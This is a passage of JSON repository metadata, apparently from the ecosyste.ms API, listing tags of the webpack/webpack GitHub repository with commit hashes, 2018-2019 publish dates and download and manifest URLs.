s_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/